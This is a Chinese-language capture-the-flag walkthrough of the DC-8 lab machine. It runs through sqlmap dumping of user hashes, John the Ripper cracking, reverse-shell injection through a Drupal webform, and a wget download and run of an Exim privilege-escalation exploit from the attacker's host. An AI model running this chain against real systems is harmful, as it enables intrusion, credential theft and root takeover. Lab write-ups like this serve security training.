信息收集
扫描当前网段
nmap -sP 192.168.202.0/24
![](https://img-blog.csdnimg.cn/050ca564430040fabc12b5d240b0bde9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
扫描开放端口
nmap -A -p- -v 192.168.202.147
![](https://img-blog.csdnimg.cn/f05f79107177406f94f66e356fce2748.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
访问靶机的80端口,用Wappalyzer识别框架
![](https://img-blog.csdnimg.cn/31a9ca1f442c48538fd88dabc175037f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
随便看看页面,简单对存在的参数进行sql测试,发现了一处疑似sql注入漏洞
![](https://img-blog.csdnimg.cn/3f2f5b99e20f40729bbd98b0f2dacd8b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/c92287d03775427dbe4a6959251e26b7.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
漏洞利用
直接放到sqlmap跑吧,懒得手测了。
sqlmap -u http://192.168.202.147?nid=1 --dbs --batch
- --batch 批处理,在检测过程中会问用户一些问题,使用这个参数统统使用默认值。
![](https://img-blog.csdnimg.cn/2a88cd8fa75240009cd487656f9f6222.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
查表
sqlmap -u http://192.168.202.147?nid=1 -D d7db --tables --batch
查字段
sqlmap -u http://192.168.202.147?nid=1 -D d7db -T users --columns --batch
读账号密码
sqlmap -u http://192.168.202.147?nid=1 -D d7db -T users -C name,pass --dump --batch
![](https://img-blog.csdnimg.cn/6219893660a74210ad211b015f09dcca.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
得出来的是密文,怎么办?看到有个用户名是john,是不是提示我们用john这个攻击?
将密文放到2.txt里面,用john爆破试试
![](https://img-blog.csdnimg.cn/ed6c841ed9524a368c7aef371dc0d92a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
使用john开始爆破hash
john 2.txt
得出john的密码为turtle,admin的账号密码没有爆出来。
得到密码后,使用dirsearch扫以下后台登录界面
![](https://img-blog.csdnimg.cn/f78986b536014181bf9ad0512a97c28c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
登录站点,四处寻找可以getshell的地方
![](https://img-blog.csdnimg.cn/2705e78e87424191b5f9bcf12f1e3ef4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
反弹shell
发现在Find content => WEBFROM => Form settings处可以操控webshell
![](https://img-blog.csdnimg.cn/aa86be22cde24061aca249b78d52dbac.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/71f26ce3fdca4868a5fb6345854614b2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/7e8b8d17dce447cfbbde07f9bc4394f0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
尝试了一下,发现直接写一句话密码没出现路径,盲测了几个也不行。所以这里换个思路,进行反弹shell,<p>标签最后不要去掉。
![](https://img-blog.csdnimg.cn/f05f65ea77e84dc5a607cecbb7c706ba.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
注意看上面<p>标签那里,这是在Contact Us这里提交后,返回给我们的话语。所以我们得在Contat Us这里随便提交点东西,才能执行php代码。
![](https://img-blog.csdnimg.cn/d85d6c8b3db94593bdad7658a2327efe.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
接收到shell后,弄个交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
提权
尝试一下SUID提权
find / -perm -4000 -print 2>/dev/null
发现有个exim4,大致是个邮件服务器,可以用来提权
![](https://img-blog.csdnimg.cn/2cdf4db658c948c89e99dfd2ea8d3027.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
(2条消息) Exim4邮件服务器_ctbinzi的博客-CSDN博客_exim邮件服务器
查看一下exim4版本,为4.89
/usr/sbin/exim4 --version
![](https://img-blog.csdnimg.cn/8f932aa83777498b8882021d838584d9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
进入searchsploit寻找一下漏洞
searchsploit exim
寻找版本合适,并且是用于提权的,找到了46996.sh
![](https://img-blog.csdnimg.cn/40c4e3c64331479a8579166527b0be15.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
将其复制到本地,并改名为getshell.sh
cp /usr/share/exploitdb/exploits/linux/local/46996.sh getshell.sh
因为这个脚本是在windows下开发,linux识别不了文件。所以需要先在本地进行编辑,如果直接在反弹拿到的shell里面用,是会报下面的错误。
![](https://img-blog.csdnimg.cn/img_convert/561e9f544b088fc46375ef805b7c9d3f.png)
用vim编辑getshell.sh
vim getshell.sh
按下Esc键,输入下面命令后回车查看文件类型,如果是dos则需要修改为unix模式使用
:set ff?
将其修改为unix模式,步骤还是一样的,修改后保存并退出
:set ff=unix
:wq
修改好后,将getshell.sh放到kali机/var/www/html/11目录下,11是个文件夹
![](https://img-blog.csdnimg.cn/9b058cd0160d4d1d9538c2d186622e14.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
在终端开启apache服务
service apache2 start
在反弹拿到的shell处,进入/tmp目录后下载
cd /tmp
wget http://192.168.202.129/11/getshell.sh
![](https://img-blog.csdnimg.cn/3dade4fbe9f948929f1ae0326353b081.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
运行sh文件还得赋予可执行权限
chmod +x getshell.sh
最后执行该文件,提权就完成了
./getshell.sh -m netcat
![](https://img-blog.csdnimg.cn/70aa2cdb93a5403393914a0b3340b96c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWnJlZGFtYW5K,size_20,color_FFFFFF,t_70,g_se,x_16)
参考文章
DC-8靶机渗透实战 - ctrl_TT豆 - 博客园 (cnblogs.com)
vulnhub-DC8靶机 - xinZa1
(2条消息) Exim4邮件服务器_ctbinzi的博客-CSDN博客_exim邮件服务器